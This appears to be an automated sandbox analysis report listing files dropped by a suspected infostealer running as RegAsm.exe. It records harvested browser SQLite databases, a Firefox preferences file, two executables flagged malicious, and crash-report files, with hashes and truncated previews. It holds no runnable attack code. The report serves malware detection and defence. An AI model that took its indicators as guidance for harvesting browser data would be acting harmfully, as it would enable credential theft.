                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\JJECFIECBGDG\AFBAFB

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                      Category:dropped
                                                      Size (bytes):28672
                                                      Entropy (8bit):2.5793180405395284
                                                      Encrypted:false
                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\JJECFIECBGDG\AKFIDH

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                      Category:dropped
                                                      Size (bytes):106496
                                                      Entropy (8bit):1.1358696453229276
                                                      Encrypted:false
                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\JJECFIECBGDG\BGIJJK

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                      Category:dropped
                                                      Size (bytes):40960
                                                      Entropy (8bit):0.8553638852307782
                                                      Encrypted:false
                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\JJECFIECBGDG\EBKJDB

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                      Category:dropped
                                                      Size (bytes):5242880
                                                      Entropy (8bit):0.037963276276857943
                                                      Encrypted:false
                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                      MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                      SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                      SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                      SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\JJECFIECBGDG\EBKJDB-shm

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):32768
                                                      Entropy (8bit):0.017262956703125623
                                                      Encrypted:false
                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                      Malicious:false
                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\JJECFIECBGDG\FHJDAA

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                      Category:dropped
                                                      Size (bytes):49152
                                                      Entropy (8bit):0.8180424350137764
                                                      Encrypted:false
                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\JJECFIECBGDG\FIIIIJ

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                      Category:dropped
                                                      Size (bytes):126976
                                                      Entropy (8bit):0.47147045728725767
                                                      Encrypted:false
                                                      SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                      MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                      SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                      SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                      SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\JJECFIECBGDG\GHJKJD

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):9571
                                                      Entropy (8bit):5.536643647658967
                                                      Encrypted:false
                                                      SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                      MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                      SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                      SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                      SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                      Malicious:false
                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                      C:\ProgramData\JJECFIECBGDG\IDBAKK

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                      Category:dropped
                                                      Size (bytes):98304
                                                      Entropy (8bit):0.08235737944063153
                                                      Encrypted:false
                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\JJECFIECBGDG\IDBAKK-shm

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):32768
                                                      Entropy (8bit):0.017262956703125623
                                                      Encrypted:false
                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                      Malicious:false
                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\JJECFIECBGDG\IIJKJD

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                      Category:dropped
                                                      Size (bytes):114688
                                                      Entropy (8bit):0.9746603542602881
                                                      Encrypted:false
                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\JJECFIECBGDG\JEGHJD

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                      Category:dropped
                                                      Size (bytes):159744
                                                      Entropy (8bit):0.7873599747470391
                                                      Encrypted:false
                                                      SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                      MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                      SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                      SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                      SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\KJKJJJECFI.exe

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):196648
                                                      Entropy (8bit):7.963093250945942
                                                      Encrypted:false
                                                      SSDEEP:6144:HQOkLP/rabJ2k24h3ErKsHJHOwiZ8byukEO:JcP/rFkLqrKQJEueukEO
                                                      MD5:70567FAE269796BF407322D0A4435054
                                                      SHA1:E11EDDF4F0CE6D5288D8187005D34EEE6EFBA046
                                                      SHA-256:5923793C30ACF9026A872FCB8CE04A671FA194BB4F73EEF165D687AE97683047
                                                      SHA-512:8C52339E85B8827FA25C1FB64FA47CA6DE25F40D6F66B5D426A276E93D10751537F03C41E144CA22A6C34D10A896EBD7A8070846984F783E293BF4B8B2A58617
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                      Joe Sandbox View:
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. .......................@......N,....`.................................X...S.......................(&... ...... ................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......x...............................................................R&(.,X..U.f.h..&\...=E.....%"=m?*<...U..Hf.t$......U!.B.#..:..d..E...\..J1..9.......K.lX.GRA..6|^...o....@.&..5........:....i .Xm..Xj...._0"L.X.EO j..%..mn.EcT%.3C.))..^.:.Tn7.w..Y....`[A.ty...N....j...s.|QT?.9..'.:.l.$.{&V..}.9..nes..[...?.wqR/_JU.8.ir_R...h..y<.<..@/......'...-U..v8.F.2z..U'..q..5,....+..GE..?@..@!........?.Yy.2.....Yq._..vd[.....D....VR.Q..<..P.[.b.#_.D.../...6.Y....

                                                      C:\ProgramData\KKJEBAAECB.exe

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):328744
                                                      Entropy (8bit):7.984051528678991
                                                      Encrypted:false
                                                      SSDEEP:6144:zKKOAlrAtx7WiWOdkUsn18kq1viAXMFTd7r9pq8CG6UKBqdx7EO:zKLYUtcrOs1yeFRPzbCGQYx7EO
                                                      MD5:087F21847D13D50158683C834471728C
                                                      SHA1:6E0CAF480014EB6239CBE757F9A75E4B5594AE69
                                                      SHA-256:353871B38BB73FFB940B773C92849796C4C71949D5FFC9EA55103A8F41DABB74
                                                      SHA-512:10B6BD132E219FCE9F5AE27B648305E412BBD64FBFABB1C67E99B30CE088914DB0B2D1750861362F28EE6E0FE2301B35878F22D06DE7FC3CF177A4216FBF3DB6
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                      Joe Sandbox View:
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. .......................@............`.................................X...S.......................(&... ...... ................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......x...............................................................S..a.....c?.6..U.CMf'.<.s.oo..<C.q.wN.e..i...e4+...........R..1br...IUU<.N...|c.VGH...$.&~.+....<38....tR]B.z.4-oC.{......{9...x0w.I7._.;!'q..U...?.`../.+,P.M......8..}.3j.$.Y=2...).W.].t*Z.>..g2.i-.....I..[.w.....u..........h..a.3.Q*....y.......=c2..n......Q.J>...=.f..w..E-`..../.....'.........g.........$.1sW...........l.....S..>.a.....g.h..zK......._oB3%.c.Z.)V.gg.._..0...;<f..

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_5c39e2f0624fb3ace2547e2d794ca76a89c913_e446d4ea_8ef2c652-2fc0-456d-9a6d-6ec7b8425150\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.0740460350499341
                                                      Encrypted:false
                                                      SSDEEP:192:WrT/eFy/d+j00BU/AjezEK2azuiFRZ24IO8Z:ehd+jvBU/AjeoazuiFRY4IO8Z
                                                      MD5:8747A01E2167C01C12BBD6630C1DBAAD
                                                      SHA1:4AB9E14BA0C0CC0DB0E486F9BEEBBE84E20BDFE6
                                                      SHA-256:8CA8F3561CABE6684A2A43858ADB9203AB9C8F8D4F65B289EC4DE378A7E48F56
                                                      SHA-512:7EB247F5A1BF1A42848151DA1180411F9D8F0EAA97AD4B6D1398A3A0DC6F01B3045BA9BCDA076951CB6AAE8CF8E6016B37F2304BDD9859A091752219ED2FC0FD
                                                      Malicious:false
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.4.3.8.3.6.0.2.9.5.4.1.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.4.3.8.3.6.0.9.9.8.5.3.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.e.f.2.c.6.5.2.-.2.f.c.0.-.4.5.6.d.-.9.a.6.d.-.6.e.c.7.b.8.4.2.5.1.5.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.3.2.9.a.1.d.1.-.6.9.8.8.-.4.1.7.9.-.8.4.5.a.-.1.c.e.4.8.2.c.6.3.3.1.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.a.4.-.0.0.0.1.-.0.0.1.4.-.4.b.9.8.-.3.0.6.0.5.5.f.a.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER6EFE.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 15 streams, Thu Aug 29 20:52:40 2024, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):104138
                                                      Entropy (8bit):2.101710244809197
                                                      Encrypted:false
                                                      SSDEEP:384:h+zjHB5Hnnk6Vk6tfs4ExmFunfI8m7Jg+XtAd1cGnCG1fK+wjyPhzH:4Hh5nRLbE3QIyDaH
                                                      MD5:0D674B5204E7695762CF9D53A51D07B7
                                                      SHA1:284AAF452826C5B48F2EF2DAB7BE658461B8F0C2
                                                      SHA-256:0430BB3241C06056398444EA29E58C8F2557E6AF8690CEBDBC6BFE8A6254B58D
                                                      SHA-512:1ABA44DE9607C90B295B13C1514CF67AC5E0B714E74C1D244A097236D676D9E9B0F871EB157CBD19AE383519B4019C34F19AA76DDCD97762C341B2B55244835A
                                                      Malicious:false
                                                      Preview:MDMP..a..... ..........f........................H...........<....$...........H..........`.......8...........T............D.."R...........%...........'..............................................................................eJ.......'......GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER7067.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):6290
                                                      Entropy (8bit):3.7161765464299523
                                                      Encrypted:false
                                                      SSDEEP:96:RSIU6o7wVetblQ6JYlQE/tN/5aM4Uh89bc3sfy0m:R6l7wVeJlQ6JYldprh89bc3sfy0m
                                                      MD5:8AFF83FDC215DB329BE3429D72EE1EC3
                                                      SHA1:2595D98EE202E1DABA6BDC6DB2349B8578A4C862
                                                      SHA-256:0A05C0280C16B99929F482FF542142B3FC78CA4BF05C4176B75ED9F4982318CD
                                                      SHA-512:90BF9B9E020A3513B01740197B4EC730722BF1382C89ABD150344DE065448E5B5124D11E6D2C3DEF2016F7A8B6F2490702F2F575266479CDA8E24954AE868486
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.1.2.<./.P.i.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER7087.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4628
                                                      Entropy (8bit):4.446980591173388
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zsbJg77aI9T4WpW8VYxYm8M4JfuMsi6F6+q8otFMCQgLuOLukrd:uIjf1I7Nx7VZJfuvwvtzBukukrd
                                                      MD5:F80C10F8D4A0ACDDCEC944F8FB4EF793
                                                      SHA1:F057BF7D0FB673F32CEC02CDDDC26A2E7FA64B2D
                                                      SHA-256:8632020086A717E73274361B046274DE0585C2C25DC7F6FBB80BF99423B22DAF
                                                      SHA-512:EBED3C8CD2DA900686263699C5659F302B0F6910DB4CAD5B4C9CDF1AB35DBD9ECD706477C63154E519A239308BA514E993D55293641E3D8C7506E0B93A2A4ECC
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="477355" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                      C:\ProgramData\freebl3.dll

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):685392
                                                      Entropy (8bit):6.872871740790978
                                                      Encrypted:false
                                                      SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                      MD5:550686C0EE48C386DFCB40199BD076AC
                                                      SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
